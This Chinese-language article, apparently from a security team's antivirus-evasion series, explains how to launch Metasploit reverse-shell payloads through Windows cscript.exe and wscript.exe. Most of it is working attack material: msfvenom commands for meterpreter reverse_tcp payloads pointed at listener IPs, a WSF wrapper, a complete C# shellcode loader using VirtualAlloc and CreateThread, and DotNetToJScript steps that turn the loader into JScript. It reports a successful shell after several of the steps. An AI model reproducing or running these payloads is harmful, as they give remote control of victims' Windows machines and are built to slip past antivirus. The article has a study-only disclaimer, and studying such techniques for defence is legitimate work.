声明：Tide安全团队原创文章，转载请声明出处！文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

文章打包下载及相关软件下载：https://github.com/TideSec/BypassAntiVirus

系统文件cscript.exe是存放在Windows系统文件夹中的重要文件，通常情况下是在安装操作系统过程中自动创建的，对于系统正常运行来说至关重要，Windows Script Host引擎在cscript.exe来寻找和连接脚本的运行库，最常见的有VBScript和JavaScript。

wscript全称“Windows Scripting Host”，是一种批次语言/自动执行工具——它所对应的程序“wscript.exe”是一个脚本语言解释器，位于C:\WINDOWS\system32目录下，正是它才使得脚本可以被执行，就象执行批处理一样，可以拿来执行.wsh，.vbs，.js等。

WScript是一个窗口化的版本；CScript是一个命令行的版本。两种版本都可以运行任何脚本。二者之间的区别是，窗口化版本（WScript）使用一个弹出对话框来显示文本输出消息，而命令行版本（CSCript）通过命令行程序所见的、常规的“标准输出”方法来显示文本。

CScript/WScript可以用来执行vbs和js等脚本，是否能达到免杀的目的取决于执行的脚本本身的免杀能力。

使用msfvenom生成vbs脚本的反弹木马。

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=172.16.100.207 lport=4444 -f vbs > TIDE.vbs

使用cscript.exe执行生成的vbs脚本。

cscript.exe TIDE.vbs

反弹成功。

使用WScript.exe执行vbs反弹脚本,可以见到和cscript.exe相比命令行中没有文本输出信息。

WScript.exe TIDE.vbs

msf上线成功。 

wsf文件是一种windows脚本文件，是一个包含可扩展标记语言（XML）代码的文本文档。把msf生成的反弹vbs代码放入到<script>标签中。

<package><job  id="IncludeExample">     	<script language="VBScript">                               #vbs代码     	</script></job></package>

使用cscript.exe执行wsf脚本。

cscript.exe TIDE.wsf

反弹成功。

使用WScript.exe执行wsf脚本。

WScript.exe TIDE.wsf

msf上线成功。 

首先需要制作一个js反弹文件，和专题39方法一致。

1、生成基于csharp的shellcode， 我们要借助于 C# 来执行生成的 Payload，所以格式要选择为 csharp。

 msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f csharp LHOST=10.211.55.2 LPORT=3333 -o shell_x86.csharp

2、然后在vs2017中创建C#的Console⼯程，.Net版本建议2.0，这样兼容性好⼀一 些，如果选了了net 4.0。其他电脑上没有装4.0的话可能就没法运⾏了。代码如下,把 shell_x86.csharp 内容放到相应MsfPayload位置。

using System;using System.Threading;using System.Runtime.InteropServices;namespace MSFWrapper{    public class Program    {        public Program()        {           RunMSF();        }        public static void RunMSF()        {            byte[] MsfPayload = {            //Paste your Payload here        };            IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);            Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);            CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);            Thread.Sleep(2000);        }        public static void Main()        {        }        [DllImport("kernel32.dll")]        public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);        [DllImport("kernel32.dll")]        public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);    }}

然后将先前生成的 Payload 的黏贴到代码中注释为“//Paste your Payload here”的地方。保存代码后，修改该工程的属性，将输出类型改为“Windows 应用程序”，启动对象改为“MSFWrapper.Program”, 然后保存。增加 Release 版的 x86 编译对象，然后生成了ConsoleApp2.exe。

3、将exe转换为脚本⽂文件 下载 DotNetToJScript: https://raw.githubusercontent.com/TideSec/BypassAntiVi rus/master/tools/DotNetToJScript.zip

将上⾯⽣成的 ConsoleApp2.exe 复制到DotNetToJScript⽬目录下，执⾏命令生成TIDE.js文件

DotNetToJScript.exe -l=JScript -o=TIDE.js -c=MSFWrapper.Program ConsoleApp2.exe

使用cscript/WScript执行

cscript.exe  MSFWrapper.jsWScript.exe MSFWrapper.js

成功上线

cscript/WScript无论是加载vbs，还是wsf和js，都会被360和火绒查杀到，因此想要绕过杀软还需要对vbs，和js脚本进行免杀处理。

vt查杀率32/57 

六、参考资料

免杀 MSF Windows Payload 的方法与实践